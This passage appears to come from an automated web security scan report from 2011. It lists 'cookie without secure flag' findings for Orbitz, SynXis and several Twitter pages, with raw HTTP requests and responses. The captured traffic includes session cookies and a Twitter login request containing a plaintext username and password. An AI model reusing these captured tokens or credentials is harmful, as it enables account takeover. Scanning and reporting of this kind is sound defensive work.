<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">

...[SNIP]...

7.4. https://faq.orbitz.com/app/answers/detail/a_id/15644 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://faq.orbitz.com
Path:	/app/answers/detail/a_id/15644

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

cp_session=VC4CdgB0AycDawNzU2UCVQRTVkABFwcrBG5baFZ2VC4DcVQ8AScCO1BgWCJQdQh7WysHb1V9ACNSNwQJBjpUZAMnAWNQcAhvUTQFOlZmAzRUdwIpACsDJwM0A3NTOgIhBFxWKwEnBzYEcVtwVj1UbQM9VAEBKgJNUGNYSFBlCEJbcwcQVXAAYlJkBDoGOFRMAzcBD1AFCAtRMQVeVhYDZVQSAiwAdQMnAyw%3D; path=/
TS8118ae=ea207c4d029b321ea2f9a03a1b4ba8facb1b7ea06212bb0d4d48259b; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/answers/detail/a_id/15644 HTTP/1.1
Host: faq.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:24:11 GMT
P3P: policyref="https://faq.orbitz.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=VC4CdgB0AycDawNzU2UCVQRTVkABFwcrBG5baFZ2VC4DcVQ8AScCO1BgWCJQdQh7WysHb1V9ACNSNwQJBjpUZAMnAWNQcAhvUTQFOlZmAzRUdwIpACsDJwM0A3NTOgIhBFxWKwEnBzYEcVtwVj1UbQM9VAEBKgJNUGNYSFBlCEJbcwcQVXAAYlJkBDoGOFRMAzcBD1AFCAtRMQVeVhYDZVQSAiwAdQMnAyw%3D; path=/
RNT-Time: D=294074 t=1296573851351523
RNT-Machine: 05
F5_do_compression: yes
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS8118ae=ea207c4d029b321ea2f9a03a1b4ba8facb1b7ea06212bb0d4d48259b; Path=/
Content-Length: 68477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">

...[SNIP]...

7.5. https://gc.synxis.com/xbe/rez.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://gc.synxis.com
Path:	/xbe/rez.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2F01%2F2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819 HTTP/1.1
Host: gc.synxis.com
Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

7.6. https://twitter.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://twitter.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:23:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663829-29665-12597
ETag: "5bfef3a89d06a35d313b487532fda84d"
Last-Modified: Wed, 02 Feb 2011 16:23:49 GMT
X-Runtime: 0.01202
Content-Type: text/html; charset=utf-8
Content-Length: 43870
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

7.7. https://twitter.com/about previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://twitter.com
Path:	/about

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

7.8. https://twitter.com/about/contact previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://twitter.com
Path:	/about/contact

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/contact HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

7.9. https://twitter.com/about/resources previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://twitter.com
Path:	/about/resources

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/resources HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

7.10. https://twitter.com/account/complete previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://twitter.com
Path:	/account/complete

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/complete HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

7.11. https://twitter.com/account/resend_password previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://twitter.com
Path:	/account/resend_password

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/resend_password HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

7.12. https://twitter.com/login previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://twitter.com
Path:	/login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

7.13. https://twitter.com/privacy previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://twitter.com
Path:	/privacy

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

7.14. https://twitter.com/sessions previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://twitter.com
Path:	/sessions

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6%250AC25vdGljZTAGOgpAdXNlZHsGOwlUOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1%250ANTg3NTBiY2U0NmNhODk%253D--fab0553612e262a6d5d29dd57d955d0f7cbb2852; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /sessions HTTP/1.1
Host: twitter.com
Connection: keep-alive
Referer: http://twitter.com/
Cache-Control: max-age=0
Origin: http://twitter.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; k=173.193.214.243.1296227675375304; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; __utmc=43838368; __utmv=43838368.lang%3A%20en; __utmb=43838368.3.10.1296663641; _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCPJPud4tAToVaW5fbmV3X3VzZXJfZmxvdzA6%250AB2lkIiUwZWU5YmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2Y2E4OSIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--0a212e703bac9709a6ddd2f1c5c5ab3b89a5d893
Content-Length: 177

authenticity_token=71981bb5debfc2445761679aeeed4ee938c6df49&return_to_ssl=false&redirect_after_login=%2F&session%5Busername_or_email%5D=rtfm99&session%5Bpassword%5D=Fast1Dial&q=

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:20:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663624-67827-7280
ETag: "6334676dad503e4572604b69dc79a0bf"-gzip
Last-Modified: Wed, 02 Feb 2011 16:20:24 GMT
X-Runtime: 0.04848
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6%250AC25vdGljZTAGOgpAdXNlZHsGOwlUOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1%250ANTg3NTBiY2U0NmNhODk%253D--fab0553612e262a6d5d29dd57d955d0f7cbb2852; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 12274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

7.15. https://twitter.com/sessions/change_locale previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://twitter.com
Path:	/sessions/change_locale

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sessions/change_locale HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 404 Not Found
Date: Wed, 02 Feb 2011 16:24:11 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1296663851-55698-5858
Last-Modified: Wed, 02 Feb 2011 16:24:11 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

7.16. https://twitter.com/sessions/destroy previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://twitter.com
Path:	/sessions/destroy

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

